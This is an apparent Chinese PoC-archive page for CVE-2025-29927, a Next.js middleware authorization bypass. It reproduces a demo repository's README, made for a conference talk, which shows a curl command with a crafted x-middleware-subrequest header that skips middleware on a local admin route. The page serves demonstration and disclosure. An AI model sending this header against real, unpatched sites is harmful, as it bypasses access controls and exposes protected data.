POC详情: 4e8e3c745b0d0eb76ed0a7fe57e68b7a611f8aed

来源
https://github.com/nicknisi/next-attack
关联漏洞
标题: Next.js 安全漏洞 (CVE-2025-29927)
描述:Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。
描述
A demo of the CVE-2025-29927 vulnerability for a NebraskaJS lightning talk
介绍
This is a [Next.js](https://nextjs.org) project bootstrapped with [`create-next-app`](https://nextjs.org/docs/app/api-reference/cli/create-next-app).

## Testing the vulnerability

First, you can confirm that the middleware works and should redirect the user:

```bash
curl http://localhost:3000/api/admin
```

Then, you can show how the middleware is being bypassed with the followign command:

```bash
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin
```

## Getting Started

First, run the development server:

```bash
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
```

Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.

You can start editing the page by modifying `app/page.tsx`. The page auto-updates as you edit the file.

This project uses [`next/font`](https://nextjs.org/docs/app/building-your-application/optimizing/fonts) to automatically optimize and load [Geist](https://vercel.com/font), a new font family for Vercel.

## Learn More

To learn more about Next.js, take a look at the following resources:

- [Next.js Documentation](https://nextjs.org/docs) - learn about Next.js features and API.
- [Learn Next.js](https://nextjs.org/learn) - an interactive Next.js tutorial.

You can check out [the Next.js GitHub repository](https://github.com/vercel/next.js) - your feedback and contributions are welcome!

## Deploy on Vercel

The easiest way to deploy your Next.js app is to use the [Vercel Platform](https://vercel.com/new?utm_medium=default-template&filter=next.js&utm_source=create-next-app&utm_campaign=create-next-app-readme) from the creators of Next.js.

Check out our [Next.js deployment documentation](https://nextjs.org/docs/app/building-your-application/deploying) for more details.
文件快照

 [4.0K]  /data/pocs/4e8e3c745b0d0eb76ed0a7fe57e68b7a611f8aed
├── [ 133]  next.config.ts
├── [ 482]  package.json
├── [ 46K]  package-lock.json
├── [  81]  postcss.config.mjs
├── [4.0K]  public
│   ├── [ 391]  file.svg
│   ├── [1.0K]  globe.svg
│   ├── [1.3K]  next.svg
│   ├── [ 128]  vercel.svg
│   └── [ 385]  window.svg
├── [1.8K]  README.md
├── [4.0K]  src
│   ├── [4.0K]  app
│   │   ├── [4.0K]  api
│   │   │   └── [4.0K]  admin
│   │   │       └── [ 139]  route.ts
│   │   ├── [ 25K]  favicon.ico
│   │   ├── [ 488]  globals.css
│   │   ├── [ 689]  layout.tsx
│   │   └── [4.0K]  page.tsx
│   └── [ 216]  middleware.ts
└── [ 602]  tsconfig.json

5 directories, 17 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。